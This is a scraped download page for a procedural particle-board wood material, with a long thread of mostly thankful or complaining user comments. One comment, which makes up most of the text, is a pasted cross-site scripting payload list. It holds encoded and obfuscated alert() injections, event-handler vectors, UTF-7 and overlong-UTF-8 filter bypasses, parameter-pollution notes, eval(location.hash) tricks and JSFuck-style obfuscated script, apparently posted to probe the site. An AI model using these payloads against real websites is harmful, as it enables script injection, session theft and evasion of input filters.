(41)

Particle Board Wood

Jeremie Noguer

MaterialsWood

Rough procedural particle board.

Uploaded: about 5 years ago
Updated: over 4 years ago
Version: 1
File Name: particle_board.zip
Size: 7.5 KB

DownloadblackDOWNLOAD



DISCUSS
about 5 years ago

GReat!!!!


almost 5 years ago

tanks


over 4 years ago

I get an error on the download?


over 4 years ago

как это сасдать


over 4 years ago

how to create


over 4 years ago

thanks


over 4 years ago

For some reason, it's not tileable here.


almost 4 years ago

...哇


almost 4 years ago

nice !


almost 4 years ago

It isn't tiling that well. Seam really pops.


over 3 years ago

非常感谢


over 3 years ago

thanks


over 3 years ago

Thank you ever so kindly. :3


over 3 years ago

Needed in every room.


over 3 years ago

Круто


over 3 years ago

Thank U♡


over 3 years ago

thank you so much


over 3 years ago

great


over 3 years ago

thanks


over 3 years ago

Thank you very much!


over 3 years ago

If people could stop uploading uneditable sbsar and uplaod sbs instead, that'd be nice


over 3 years ago

Awesome~


almost 3 years ago

great, thanks a lot


almost 3 years ago

THANKS


over 2 years ago

It is not tileble


over 2 years ago

can you share the .sbs as well?


about 2 years ago

Thank You !!


almost 2 years ago

substance牛逼!!!


over 1 year ago

Thanks for the texture


about 1 year ago

Very nice!!!


11 months ago

GReat!!!!


11 months ago

Thanks.


7 months ago

Thank you very much!


7 months ago

"/>
">
">

%253cimg%20onerror=alert(1)%20src=a%253e

%3cimg onerror=alert(1) src=a%3e

«img onerror=alert(1) src=a»

a\u006cert(1);

eval(‘a\u006cert(1)’);

eval(‘a\x6cert(1)’);

eval(‘a\154ert(1)’);

eval(‘a\l\ert\(1\)’);

eval(‘al’+’ert(1)’);

eval(String.fromCharCode(75,67,70));

eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));

’alert(1)’.replace(/.+/,eval)

function::[‘alert’](1)

MsgBox 1

MSGBOX 1

execScript(“MsgBox 1”,”vbscript”);

execScript(“alert(1)”)

EXECSCRIPT(LCASE(“ALERT(1)”))

var a = ‘alert(1)

alert(‘kcf’)

“prompt(1)

“;alert(1)//

‘-alert(1)-’

“alert(1)

“;prompt(1)//

‘-prompt(1)-’

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

'`">javascript:alert(1)

'`">javascript:alert(1)

\x3Cscript>javascript:alert(1)

'"`>/* *\x2Fjavascript:alert(1)// */

javascript:alert(1)javascript:alert(1)javascript:alert(1)javascript:alert(1)

--> -->

-->

-->

-->

`"'>a='hello\x27;javascript:alert(1)//';

test

test

test

test

test

test

test

test

test

test

test

test

test

test

/* *\x2A/javascript:alert(1)// */

/* *\x00/javascript:alert(1)// */

"'`>ABCDEF

"'`>ABCDEF

if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}

if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}

if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}

'`">javascript:alert(1)

"'`>

"'`>

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

"`'>\x3Bjavascript:alert(1)

"`'>\x0Djavascript:alert(1)

"`'>\xEF\xBB\xBFjavascript:alert(1)

"`'>\xE2\x80\x81javascript:alert(1)

"`'>\xE2\x80\x84javascript:alert(1)

"`'>\xE3\x80\x80javascript:alert(1)

"`'>\x09javascript:alert(1)

"`'>\xE2\x80\x89javascript:alert(1)

"`'>\xE2\x80\x85javascript:alert(1)

"`'>\xE2\x80\x88javascript:alert(1)

"`'>\x00javascript:alert(1)

"`'>\xE2\x80\xA8javascript:alert(1)

"`'>\xE2\x80\x8Ajavascript:alert(1)

"`'>\xE1\x9A\x80javascript:alert(1)

"`'>\x0Cjavascript:alert(1)

"`'>\x2Bjavascript:alert(1)

"`'>\xF0\x90\x96\x9Ajavascript:alert(1)

"`'>-javascript:alert(1)

"`'>\x0Ajavascript:alert(1)

"`'>\xE2\x80\xAFjavascript:alert(1)

"`'>\x7Ejavascript:alert(1)

"`'>\xE2\x80\x87javascript:alert(1)

"`'>\xE2\x81\x9Fjavascript:alert(1)

"`'>\xE2\x80\xA9javascript:alert(1)

"`'>\xC2\x85javascript:alert(1)

"`'>\xEF\xBF\xAEjavascript:alert(1)

"`'>\xE2\x80\x83javascript:alert(1)

"`'>\xE2\x80\x8Bjavascript:alert(1)

"`'>\xEF\xBF\xBEjavascript:alert(1)

"`'>\xE2\x80\x80javascript:alert(1)

"`'>\x21javascript:alert(1)

"`'>\xE2\x80\x82javascript:alert(1)

"`'>\xE2\x80\x86javascript:alert(1)

"`'>\xE1\xA0\x8Ejavascript:alert(1)

"`'>\x0Bjavascript:alert(1)

"`'>\x20javascript:alert(1)

"`'>\xC2\xA0javascript:alert(1)

"/>

"/>

"/>

"/>

"/>

"/>

"/>

"/>

"/>

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

javascript:alert(1)<\x00/script>

<img src=# onerror\x3D"javascript:alert(1)" >

<video poster=javascript:javascript:alert(1)//

<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X

<video><source onerror="javascript:javascript:alert(1)">

<video onerror="javascript:javascript:alert(1)"><source>

<form><button formaction="javascript:javascript:alert(1)">X

<body oninput=javascript:alert(1)><input autofocus>

<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/kcf.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>

<frameset onload=javascript:alert(1)>

<table background="javascript:javascript:alert(1)">

<!--<img src="--><img
----------------------------

<sCrIpt>alert(1)

\

alert(1)

Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)

alert(0)

body{background-color:expression\(alert(1))}

document.write(‘<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>’);

HTML Encoding

URL Encoding

CSS Hexadecimal Encoding
Joker
Joker
Joker
Joker

JavaScript
document.write(‘<img src=1 onerror=alert(1)>’);
document.write(‘\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E’);
document.write(‘\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076’);
document.write(‘\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E’);

JavaScript
document.write(‘<img src=1 onerror=alert(1)>’);
document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));

JavaScript
alert(123)
\u0061\u006C\u0065\u0072\u0074(123)

Overlong UTF-8
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
‘ = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
” = %C0%A2 = %E0%80%A2 = %F0%80%80%A2

%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE

UTF-7 (Missing charset?)

+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

Unicode .NET Ugliness
alert(1)
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e

Classic ASP

%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

and/or Useful features.
HTML 5 (Not comphrensive)

Usuage of non-existent elements

CSS Comments

JavaScript functions
window[‘alert’](0)
parent[‘alert’](1)
self[‘alert’](2)
top[‘alert’](3)

JavaScript into HTML

var junk = ‘alert(1)’;

HTML CSS

body { background-image:url(‘http://www.blah.com/alert(1)’); }

XML documents

URI Schemes

(IE)
alert(0)”> (Firefox, Chrome, Safari)
(Firefox, Chrome, Safari)

HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2

eval(location.hash.slice(1))
eval(location.hash) (Firefox)

http://target.com/something.jsp?inject=eval(location.hash.slice(1))#alert(1)
eval(name)” name=”alert(1)”>

$=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+””)[$],_$_:++$,$_$$:({}+””)[$],$$_$:($[$]+””)[$],_$$:++$,$$$_:(!””+””)[$],$__:++$,$_$:++$,$$__:({}+””)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+””)[$.__$])+((!$)+””)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!””+””)[$.__$])+($._=(!””+””)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!””+””)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+”\””+$.$_$_+(![]+””)[$._$_]+$.$$$_+”\\”+$.__$+$.$$_+$._$_+$.__+”(“+$.___+”)”+”\””)())();

(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()


over 4 years ago

error here too.. click on 'download' link and screen shows garbled text. :(